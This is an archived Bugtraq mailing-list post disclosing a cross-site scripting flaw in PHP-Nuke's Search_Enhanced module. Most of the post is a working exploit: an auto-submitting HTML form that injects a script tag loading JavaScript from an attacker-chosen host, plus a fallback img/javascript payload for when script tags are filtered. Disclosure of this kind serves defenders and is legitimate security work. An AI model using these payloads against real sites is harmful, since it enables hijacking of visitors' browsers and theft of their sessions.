PHP-Nuke Cross-Site Scripting Vulnerability

bhfh01_at_gmail.com
Date: 10/25/05

  • Next message: Debasis Mohanty: "RE: [Full-disclosure] Multiple Vendor Anti-Virus Software DetectionEvasion Vulnerability through forged magic byte"
    Date: 25 Oct 2005 19:03:10 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) i am sorry but i had a little problem with my
    old e-mail address , my new one is bhfh01@gmail.com

    the mail:

    PHP-Nuke
    Search Cross-Site Scripting Vulnerability

    Vulnerable: i think all ver.
    data:2005-09-5

    The search field at modules.php?name=Search_Enhanced is vulnerable to html injection attacks.

    exploit :

    #open_me.htm ::

    <html>
    <form name=searchform method=post action=http://[target]/modules.php?name=Search_Enhanced>
    <input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
    <input type=submit name=sub>
    <script>document.searchform.sub.click()</script>
    </html>

    Note: the chars ' and " are not allowd in that search.

    If the '<script>' tag isnt allowed , try to search the value: <img src=javascript:alert(&quot;xss-here&quot;)> ...

    thanks , B~HFH.
    bhfh01@gmail.com


  • Next message: Debasis Mohanty: "RE: [Full-disclosure] Multiple Vendor Anti-Virus Software DetectionEvasion Vulnerability through forged magic byte"

    Relevant Pages

    • [NEWS] %u Encoding IDS Bypass Vulnerability (UTF)
      ... %u Encoding IDS Bypass Vulnerability (UTF) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability has been found in the way many Intrusion ...
      (Securiteam)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (NT-Bugtraq)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (Bugtraq)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (Focus-Microsoft)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (Focus-IDS)